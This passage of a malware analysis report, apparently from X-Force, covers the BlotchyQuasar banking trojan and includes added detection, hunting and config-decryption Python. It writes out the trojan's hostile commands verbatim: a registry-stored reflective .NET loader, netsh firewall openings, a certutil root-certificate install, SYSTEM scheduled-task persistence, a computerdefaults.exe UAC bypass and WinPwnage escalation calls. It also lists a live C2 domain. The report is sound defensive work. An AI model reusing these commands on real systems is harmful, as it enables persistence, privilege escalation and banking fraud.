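    r"Get-ItemProperty\s+(?:-Path\s+)?['\"]?((?:HKCU|HKLM|HKU|HKCR):[^\s'\")]+)['\"]?\s*\)?\.(\w+)",
    re.IGNORECASE,
)
ENTRYPOINT_INVOKE = re.compile(r"\.EntryPoint\.Invoke\s*\(", re.IGNORECASE)


def scan_scriptblocks(blocks):
    """blocks: iterable of (source, text) where text is a script block body or a process
    command line. Returns one finding per block that matches the whole loader chain."""
    findings = []
    for source, text in blocks:
        if not (REFLECTIVE_LOAD.search(text) and BASE64_DECODE.search(text)):
            continue
        reg = REGISTRY_READ.search(text)
        if reg is None:
            continue
        findings.append({
            "source": source,
            "registry_path": reg.group(1),   # key that stores the Base64 payload
            "value": reg.group(2),           # value name read from that key
            "invokes_entrypoint": bool(ENTRYPOINT_INVOKE.search(text)),
        })
    return findings


def looks_like_dotnet_assembly(b64):
    """Cheap triage of the blob found under the flagged registry value: a managed PE starts
    with the MZ header and references mscoree.dll, the CLR shim, in its import table."""
    try:
        blob = base64.b64decode(b64, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return blob[:2] == b"MZ" and b"mscoree.dll" in blob


# Constructed sample inputs (not captured from a real host).
SAMPLE_BLOCKS = [
    # The dllR command from the report, as the "MicrosoftUpdate" task would run it.
    ("task:MicrosoftUpdate",
     r"[System.Reflection.Assembly]::Load([System.Convert]::FromBase64String("
     r"(Get-ItemProperty HKCU:\Software\Microsoft\MozillaPlugins).Data)).EntryPoint.Invoke($Null,$Null)"),
    # Benign: reads a registry value but loads nothing.
    ("admin-script.ps1",
     r"(Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').ProductName"),
    # Benign: loads an assembly from disk, with no Base64 decode and no registry read.
    ("build.ps1", r"[Reflection.Assembly]::LoadFile('C:\tools\helper.dll')"),
]

# A fake managed-PE header, just enough for the triage check to succeed.
FAKE_ASSEMBLY_B64 = base64.b64encode(b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"mscoree.dll\x00").decode()

if __name__ == "__main__":
    for finding in scan_scriptblocks(SAMPLE_BLOCKS):
        print(finding)
```

Only the first sample block is reported, with HKCU:\Software\Microsoft\MozillaPlugins and the value Data as the place to pull the payload from for full analysis; the registry read alone and the file-based LoadFile call are left out, which keeps the rule quiet on ordinary administration scripts.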
Command: “Logon” (Name, URL_dll):
If a registry key exists at
HKCU\Software\Microsoft\MozillaPlugins\<Name>
the payload is pulled from the registry and the .NET DLL’s function <Name>.Logon.Main is called.
If the registry key does not exist, the payload is first downloaded from the URL to
- <RAT_StartupPath>\<Name>.dll
before it is written to the registry and executed.
After execution, the trojan will again read a new file at %LOCALAPPDATA%\Microsoft\user.db and parse out strings from lines containing the string “Correct”. Finally, the result is relayed back to the C2 server and written to the registry at:
HKCU\Software\Microsoft\Windows\CurrentVersion\Themes\KEY
This command is likely an improved version of the “LogonW7” command.
Command: “Pytho” (URL_exe):
A file is downloaded from the URL to
- %TMP%\py.exe
A new directory is created at
- C:\py
and py.exe is executed.
Next, C:\py is added to the Path environment variable.
Lastly, the following registry keys are set:
HKCU\Software\Classes\Applications\python.exe\shell\open\command = "C:\py\python.exe" "%1"
HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\py\python.exe.FriendlyAppName = Python
HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\py\python.exe.ApplicationCompany = Python Software Foundation
The return message is: “Python was installed successfully”
Command: “HtmlVN_C” (URL_install, URL_kiosk, action):
For action: “Installvn”:
A file is downloaded from the installation URL to
- <RAT_StartupPath>\htmlvn_c.exe
and executed. It is likely an installer for the TightVNC software.
The following commands change the client’s firewall to allow inbound connections on ports 8080, 5900 and 80 and allow the installed TightVNC server to accept connections.
netsh advfirewall firewall add rule name=node dir=in action=allow protocol=tcp localport=8080
netsh advfirewall firewall add rule name=node dir=in action=allow protocol=tcp localport=5900
netsh advfirewall firewall add rule name=node dir=in action=allow protocol=tcp localport=80
netsh advfirewall firewall add rule name=vpn dir=in action=allow program=%APPDATA%\DobleV\TSPortable\tightvnc-64bit\tvnserver.exe enable=yes
The last command applies a registry file, which is part of the TightVNC installation:
regedit /s %APPDATA%\DobleV\TSPortable\tightvnc-64bit\TSPortable.reg
Finally, it returns the message: “*Now Run TvnServer in the double…”.
For action: “StartVN”:
First, the command confirms that Chrome Portable and TightVNC are installed at:
- %APPDATA%\Chrome\chrome.exe
- %APPDATA%\DobleV\TSPortable\tightvnc-64bit\tvnserver.exe
It will then start tvnserver.exe.
Lastly, a temporary batch file is written and executed:
@echo off
chcp 65001
echo DONT CLOSE THIS WINDOW!
ping -n 10 localhost > nul
CD %APPDATA%\DobleV\nginx
start nginx.exe
CD %APPDATA%\DobleV\node
start node.exe config.js
start Chrome.exe --app=<URL_kiosk> --kiosk
del /a /q /f "<temp_batch_file>"
The script is designed to start a local Node.js server and a local NGINX server, which are both within the “DobleV” directory. After both servers are up, Google Chrome is started in kiosk mode with the attacker-specified kiosk-URL. This mode is often used in point-of-sale systems and locks the user into a specific full-screen browser window, without allowing access to any other windows.
For action: “StopVN”:
All processes with the following names are killed:
- chrome
- nginx
- node
Command: “scanner” ():
First, the trojan checks if a file exists at
- C:\py\python.exe
Next, it runs three commands:
C:\py\python.exe C:\py\main.py -s uac
C:\py\python.exe C:\py\main.py -s persist
C:\py\python.exe C:\py\main.py -s elevate
The file main.py is likely a version of the open-source WinPwnage project on GitHub, a script that attempts various techniques for UAC bypass, persistence and privilege escalation.
Command: “ChromeP” (URL_exe, URL_cer):
A file is downloaded from the URL to
- <RAT_StartupPath>\Chrome.exe
and executed (likely a Chrome Portable installer).
The second file is downloaded from the URL to
- <RAT_StartupPath>\Fot.cer
It runs the command:
certutil -f -v -addstore -enterprise root "<RAT_StartupPath>\Fot.cer"
which will add the file as a root certificate to the enterprise store.
The Chrome installer is deleted from <RAT_StartupPath>\Chrome.exe and existing Chrome user data is copied to the Portable Chrome directory:
%LOCALAPPDATA%\Google\Chrome\User Data\Default -> %APPDATA%\Chrome\Data\profile\Default
Return message is: “Chrome Portable was installed successfully.”
Command: “OperaP” (URL_exe, URL_cer):
This command does essentially the same as the ChromeP command for the Opera browser.
Downloaded file path is:
- <RAT_StartupPath>\Opera.exe
The user data is copied over as well:
%APPDATA%\Opera Software\Opera Stable -> %APPDATA%\Opera\App\Opera\profile\data
Return message is: “Opera Portable was installed successfully.”
Command: "Usoris" (URL_exe):
A file is downloaded from the URL to
- %APPDATA%\Usoris\Usoris.exe
and executed (likely an installer for the Remote Utilities remote-access software).
A new scheduled task, running as SYSTEM with the highest run level, is created to start the Remote Utilities server executable every 3 minutes:
schtasks /create /RU SYSTEM /tn Microsoft\Windows\ShowProvidersFilesWerSvct /SC MINUTE /MO 3 /RL HIGHEST /tr "%APPDATA%\Usoris\rutserv.exe" /f
The task name is placed under the built-in Microsoft\Windows task folder to blend in, while the binary it runs lives in a user-writable profile directory; the combination of /RU SYSTEM with an action under %APPDATA% is a useful hunting criterion.
Next, a registry file %APPDATA%\Usoris\w10.reg (or w7.reg on Windows 7/8) is applied.
The Remote Utilities user ID is parsed from the logs at %APPDATA%\Remote Utilities Agent\Logs\rut_log_<date>.html and written to the registry value:
HKCU\Software\Microsoft\Windows\CurrentVersion\Themes\UID
The command's return message is: "Remote utilities host was installed successfully with ID: <UID>"
Command: "BY_UA_C" ():
First, the command checks that the malware is not already running with administrator privileges and that the host is Windows 10.
After closing its mutex, it attempts a UAC bypass through the auto-elevating Windows binary computerdefaults.exe. On launch that binary opens the ms-settings: protocol handler, and because the per-user HKCU\Software\Classes hive is consulted before the machine-wide one, an unprivileged process can point the handler at itself; the same technique is widely used with fodhelper.exe.
To achieve this, the following registry values are set:
HKCU\Software\Classes\ms-settings\shell\open\command\<default_key> = <trojan_current_path>
HKCU\Software\Classes\ms-settings\shell\open\command\DelegateExecute = 0
Finally, it runs the following command so that the elevated computerdefaults.exe starts a new instance of the trojan with elevated privileges:
cmd.exe /c start computerdefaults.exe
For hunting, a process writing under HKCU\Software\Classes\ms-settings\shell\open\command followed shortly by computerdefaults.exe (or fodhelper.exe) spawning a non-Microsoft child process is a reliable indicator of this bypass.
Command: “Hvn_c” (URL_exe, argument):
A file is downloaded from the URL to
- <RAT_StartupPath>\NServises.exe
and executed with the provided argument. The payload is likely a hVNC tool (hidden-VNC). Hidden-VNC tools may be used to directly control a remote computer in a hands-on manner, but without the victim in front of the machine noticing. It accomplishes this by creating a hidden Desktop, which is used by the attacker to control windows. This technique is popular among banking trojans, in order to make a transaction seem more legitimate since it is sent directly from the victim’s physical device and browser.
The return message states: “HVNC Connected”.
Command: "CerrarProceso" (Name):
Kills all processes with the specified name.
Command: "metodo" (ID):
First, it checks whether a file exists at
- C:\py\python.exe
Then the currently running executable is copied into the C:\py directory, the mutex is closed and the following command is run:
C:\py\python.exe C:\py\main.py --use uac --id <ID> --payload C:\py\<malware_exe_path>
This is WinPwnage's "--use" mode: it runs the UAC bypass technique with the given ID (one of those enumerated by the "scanner" command) with the copied trojan as payload, so that a new, elevated instance of the trojan is started.
Command: "DisaDef" ():
Runs the same functions as during initialization, with the goal of disabling Windows Defender and UAC via various commands and registry alterations.
Command: "Rename" (Name):
Changes the client name, i.e. how the victim is displayed on the C2 panel.
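Most of the commands above leave distinctive process command lines behind, and the cheapest way to turn this write-up into coverage is to match those lines in process-creation telemetry. The following is an added example, not X-Force tooling: it runs a handful of rules (the SYSTEM scheduled task pointing into %APPDATA%, the certutil root-store install, Chrome in --app/--kiosk mode, the computerdefaults.exe launch and the WinPwnage invocations) over Sysmon-style JSON lines. The field names Image and CommandLine, the sample events (including the .invalid URL and the user profile path) are constructed assumptions; adapt the parser to the real pipeline's schema.

```python
"""Hunt for BlotchyQuasar post-exploitation command lines in process-creation
telemetry.  Added example, not X-Force's tooling.  Assumptions: events arrive
as JSON lines with Sysmon-style "Image" and "CommandLine" fields; the sample
events below are constructed (the URL uses the reserved .invalid TLD)."""
import json
import re

# Constructed sample telemetry: five events modelled on the commands described
# in the analysis, plus two benign events that must not match.
SAMPLE_LOG = r'''
{"Image": "C:\\Windows\\System32\\schtasks.exe", "CommandLine": "schtasks /create /RU SYSTEM /tn Microsoft\\Windows\\ShowProvidersFilesWerSvct /SC MINUTE /MO 3 /RL HIGHEST /tr \"C:\\Users\\v\\AppData\\Roaming\\Usoris\\rutserv.exe\" /f"}
{"Image": "C:\\Windows\\System32\\certutil.exe", "CommandLine": "certutil -f -v -addstore -enterprise root \"C:\\Users\\v\\AppData\\Roaming\\Fot.cer\""}
{"Image": "C:\\Users\\v\\AppData\\Roaming\\Chrome\\Chrome.exe", "CommandLine": "Chrome.exe --app=https://bank-login.example.invalid/ --kiosk"}
{"Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c start computerdefaults.exe"}
{"Image": "C:\\py\\python.exe", "CommandLine": "C:\\py\\python.exe C:\\py\\main.py -s uac"}
{"Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "CommandLine": "chrome.exe --profile-directory=Default"}
{"Image": "C:\\Windows\\System32\\schtasks.exe", "CommandLine": "schtasks /query /tn \\Microsoft\\Windows\\Defrag\\ScheduledDefrag"}
'''


def _basename(image):
    """Lower-cased file name of a Windows image path."""
    return image.rsplit("\\", 1)[-1].lower()


# Each rule maps a name to a predicate over (executable basename, lower-cased
# command line).  Rules are deliberately narrow so a hit is worth triage.
RULES = {
    # Usoris: SYSTEM task whose action points into the user's roaming profile
    "schtasks_system_task_from_appdata": lambda exe, cl: (
        exe == "schtasks.exe" and "/create" in cl
        and re.search(r"/ru\s+system\b", cl) is not None
        and re.search(r'/tr\s+"?[^"]*\\appdata\\roaming\\', cl) is not None),
    # ChromeP / OperaP: certificate pushed into the (enterprise) Root store
    "certutil_root_store_install": lambda exe, cl: (
        exe == "certutil.exe"
        and re.search(r'-addstore\s+(?:-enterprise\s+)?"?root\b', cl) is not None),
    # HtmlVN_C: Chrome locked full-screen on an attacker-chosen page
    "chrome_kiosk_app": lambda exe, cl: (
        exe == "chrome.exe" and "--kiosk" in cl and "--app=" in cl),
    # BY_UA_C: auto-elevating computerdefaults.exe launched via cmd.exe
    "computerdefaults_uac_bypass": lambda exe, cl: (
        exe == "cmd.exe"
        and re.search(r"\bstart\s+computerdefaults\.exe", cl) is not None),
    # scanner / metodo: WinPwnage driven from C:\py
    "winpwnage_main_py": lambda exe, cl: (
        exe == "python.exe"
        and re.search(r"\\py\\main\.py\b", cl) is not None
        and re.search(r"(?:-s|--scan|--use)\s+(?:uac|persist|elevate)\b", cl) is not None),
}


def parse_events(log_text):
    """Parse JSON-lines telemetry, skipping blank lines."""
    return [json.loads(line) for line in log_text.splitlines() if line.strip()]


def hunt(log_text):
    """Return (rule name, original command line) for every matching event."""
    hits = []
    for event in parse_events(log_text):
        exe = _basename(event.get("Image", ""))
        cl = event.get("CommandLine", "").lower()
        for name, matches in RULES.items():
            if matches(exe, cl):
                hits.append((name, event["CommandLine"]))
    return hits


if __name__ == "__main__":
    for name, cmdline in hunt(SAMPLE_LOG):
        print(f"{name:36s} {cmdline}")
```

The benign Chrome and schtasks /query events are there to show the rules do not fire on ordinary use; when porting these to a SIEM, keep the narrowing conditions (the /RU SYSTEM plus %APPDATA% pairing, --kiosk together with --app=) rather than alerting on the tool names alone.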
Encryption
The encryption used to hide the Pastebin address and the final C2 server is a simple scheme that appears copied in many projects online: the key is the MD5 hash of the string "qualityinfosolutions", and the 16-byte digest is used directly as the TripleDES key, i.e. two-key 3DES with K1 || K2 || K1. Because the key is static and derived from a hardcoded string, the C2 configuration of any sample can be decrypted offline once the ciphertext is extracted.
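The scheme can be reproduced in a few lines, which is what makes static extraction of the Pastebin and C2 strings practical. The following is an added example, not code from the sample or from X-Force: it derives the key exactly as described (MD5 of "qualityinfosolutions", used as a two-key TripleDES key) and wraps encrypt and decrypt helpers around it. The page does not state the cipher mode, padding or text encoding; ECB, PKCS7 and Base64 are assumed here from the widely copied .NET snippet this description matches, the sample plaintext is constructed, and the block needs the "cryptography" package.

```python
"""Decrypt/encrypt BlotchyQuasar-style configuration strings.  Added example,
not code from the sample.  The analysis states only the key derivation (MD5 of
"qualityinfosolutions" as the TripleDES key); ECB mode, PKCS7 padding and
Base64 output are assumptions taken from the widely copied .NET snippet this
scheme resembles.  Requires the "cryptography" package."""
import base64
import hashlib

try:  # cryptography >= 43 moved TripleDES to the "decrepit" namespace
    from cryptography.hazmat.decrepit.ciphers.algorithms import TripleDES
except ImportError:  # older releases
    from cryptography.hazmat.primitives.ciphers.algorithms import TripleDES
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, modes

KEY_PHRASE = "qualityinfosolutions"  # hardcoded in the trojan, per the analysis


def derive_key(phrase=KEY_PHRASE):
    """MD5 of the UTF-8 phrase is 16 bytes; .NET's TripleDES treats a 16-byte
    key as K1||K2 and reuses K1 as K3.  Expand explicitly to 24 bytes so the
    two-key structure is visible and the key is accepted by any 3DES API."""
    k16 = hashlib.md5(phrase.encode("utf-8")).digest()
    return k16 + k16[:8]


def _cipher(key):
    return Cipher(TripleDES(key), modes.ECB())  # assumption: ECB, no IV


def encrypt_config(plaintext, key=None):
    """Return Base64(3DES-ECB(PKCS7(plaintext))), the form the C2 strings are
    assumed to be stored in."""
    key = key or derive_key()
    padder = padding.PKCS7(64).padder()
    data = padder.update(plaintext.encode("utf-8")) + padder.finalize()
    enc = _cipher(key).encryptor()
    return base64.b64encode(enc.update(data) + enc.finalize()).decode("ascii")


def decrypt_config(b64_ciphertext, key=None):
    """Inverse of encrypt_config.  A ValueError from the unpadder is the usual
    sign that the mode or key assumption does not hold for a given sample."""
    key = key or derive_key()
    dec = _cipher(key).decryptor()
    raw = dec.update(base64.b64decode(b64_ciphertext)) + dec.finalize()
    unpadder = padding.PKCS7(64).unpadder()
    return (unpadder.update(raw) + unpadder.finalize()).decode("utf-8")


if __name__ == "__main__":
    # Constructed sample string, not a real indicator.
    blob = encrypt_config("https://pastebin.invalid/raw/example")
    print(blob)
    print(decrypt_config(blob))
```

Because the mode is assumed to be ECB, identical configuration strings in different samples produce identical ciphertext, which is itself a handy pivot. If decrypting a real sample's string fails with a padding error, revisit the mode first: for CBC, replace modes.ECB() with modes.CBC(iv) and recover the IV from the sample.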
Version updates
According to X-Force comparisons of recent versions, the banking trojan project is under active development and has been for more than two years. The most recent addition (in Version 5 – 9058) is the Google Chrome Kiosk mode feature (HtmlVN_C command), which was likely developed in early 2023. The custom UAC Bypass command (BY_UA_C) was introduced in Version 4. The oldest versions dating back to 2020 had further custom UAC Bypass methods such as Silentcleanup and CMSTP-based, however, they were replaced with the integration of the WinPwnage Python tool.
Overlap with ProyectoRAT
During analysis, X-Force found several similarities with a malware called "ProyectoRAT", reported in 2019, which targeted users in Latin America via similar phishing emails impersonating Migracion Colombia. Just as BlotchyQuasar builds on QuasarRAT, ProyectoRAT was a modification of another RAT, XpertRAT. It also had a feature "CAP", similar to BlotchyQuasar's "CaptionView", which compares window titles against a list of hardcoded strings at regular intervals. Although the list has been updated, a few of the same caption strings of Latin American banks are still used by BlotchyQuasar. Lastly, the parsing of the C2 server also bears some similarity, since both extract strings between '¡' characters. It is therefore likely that BlotchyQuasar is a greatly improved version of the original ProyectoRAT, possibly from the same developer.
Hive0129 and BlotchyQuasar: Notable impacts to Latin America
In comparison to the large threat landscape of banking trojans impacting the LATAM region, BlotchyQuasar clearly stands out. Most banking trojans such as Ousaban or Grandoreiro are developed in Delphi, whereas .NET is used far less. However, many of BlotchyQuasar’s sophisticated capabilities are shared with other banking trojans, such as the installation of root certificates, the use of proxy auto-config as well as a facilitation for hidden-VNC tools. It is also less likely to be detected as a banking trojan, due to its use of commodity loaders and the well-known QuasarRAT code-base, which acts as a smokescreen. Nevertheless, BlotchyQuasar boasts all features of a classic banking trojan with the ability to detect, manipulate and impersonate targeted banking applications for financial gain.
This campaign highlights Hive0129's continued trend of increasingly frequent and sophisticated malicious cyber activity targeting the Latin American region. Hive0129 continues to improve its toolset, including both open-source and custom tools, and is employing more complex attack chains and sophisticated techniques (such as Mark of the Web bypassing and living off the land). X-Force assesses that it is highly likely that Hive0129 will continue to enhance its tools and conduct phishing operations within the Latin America region. Entities within its targeting profile should search their environments for the IoCs listed below and continue monitoring available intelligence to keep pace with the group's rapidly evolving tools and TTPs.
Indicators of Compromise
Indicator | Indicator Type | Context
 | URL | Geofenced download URL
ecc4f23a3e3b6021f952d1c715739ced6997882ad023fa0d8eeedb87a55993e5 | SHA256 | Encrypted LHA archive
dc71d0f6cd67a4a5d606efdf0fe8ab734f73784516fe4e5b8ea5e69b6d130375 | SHA256 | Packed BlotchyQuasar
ecuadorlab[.]work[.]gd:9058 | Domain | C2 server
The post BlotchyQuasar: X-Force Hive0129 targeting financial institutions in LATAM with a custom banking trojan appeared first on Security Intelligence.